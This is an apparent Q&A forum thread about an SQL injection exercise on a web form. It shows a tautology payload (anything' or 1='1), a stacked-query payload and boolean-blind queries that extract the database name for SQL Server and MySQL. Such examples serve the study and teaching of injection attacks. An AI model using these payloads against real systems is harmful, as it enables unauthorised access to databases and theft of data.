I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:

select * from contacts where name = ''

I managed to see the users in the table using this:

select * from contacts where name = 'anything' or 1='1'

But my question is how I can write it so that I can write a new query? Or see the database name for example so that I can check other tables.

EDIT:

To avoid confusion the query is not given to us, there is a textfield on a webpage, that's what we use to do SQL injection.

So imagine the query is being this:

select * from contacts where name = ''

And I wrote this to the text field, to see all the users.

anything' or 1='1

I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.

Thank you.

So if the query is :

select * from contacts where name = ''

You can try something like:

'; select * from anotherTableName'

If your data does not return multi-result sets then you can so something like:

In SQL Server

SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...

Until you get all the correct indexes of the characters in the name.

In MySQL it would be something like:

SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...